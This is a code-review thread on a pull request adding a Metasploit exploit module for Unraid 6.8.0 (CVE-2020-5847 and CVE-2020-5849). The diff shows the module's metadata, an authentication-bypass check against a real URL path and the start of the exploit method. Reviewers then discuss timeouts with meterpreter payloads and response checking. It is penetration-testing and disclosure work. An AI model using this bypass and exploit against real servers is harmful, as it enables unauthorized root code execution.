modules/exploits/linux/http/unraid_eval.rb

```diff
@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Unraid 6.8.0 Remote Code Execution',
+        'Description' => %q(
+          This module exploits two vulnerabilities affecting Unraid 6.8.0.
+          An authenticated bypass is used to gain access to the administrative
+          interface, and an insecure use of the extract PHP function can be abused
+          for arbitrary code execution as root.
+        ),
+        'Author'      =>
+          [
+            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
+          ],
+        'References'  =>
+          [
+            [ 'CVE', '2020-5847' ],
+            [ 'CVE', '2020-5849' ],
+            [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
+            [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['php'],
+        'Privileged'     => false,
+        'Arch'           => ARCH_PHP,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Feb 10 2020'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+        'method'    => 'GET',
+      )
+      if res && res.code == 200
+        vprint_good('Authentication bypass is working')
+      else
+        Exploit::CheckCode::Safe
+      end
+      /\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})&nbsp;/ =~ res.body
+
+      if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      vprint_status('Sending exploit code')
+      send_request_cgi(
```

Comment:
Is there any value in checking the HTTP response code or body, in the event of failure?

Reply:
Hi @bcoles , I can add a check, but when using some payloads (like meterpreter), the call to *eval* is blocking, so send_request_cgi timeout. Any tips how to solve this?

Reply:
Not really, unless you can fork() and background somehow. You could add `'DefaultOptions' => { 'PrependFork' => true }` to the module info hash, although this doesn't work for all payloads. The traditional approach is to simply let it timeout.

My suggestions was more about error checking. For example, if the connection times out, that's presumably ok. If the server responds with "your input looks bad and you are bad" then maybe a bad character was in the payload. If the server replies with 200 ok, then maybe that's ok. If the server responds with 401/403 or a redirect back to the login page, then maybe it's patched.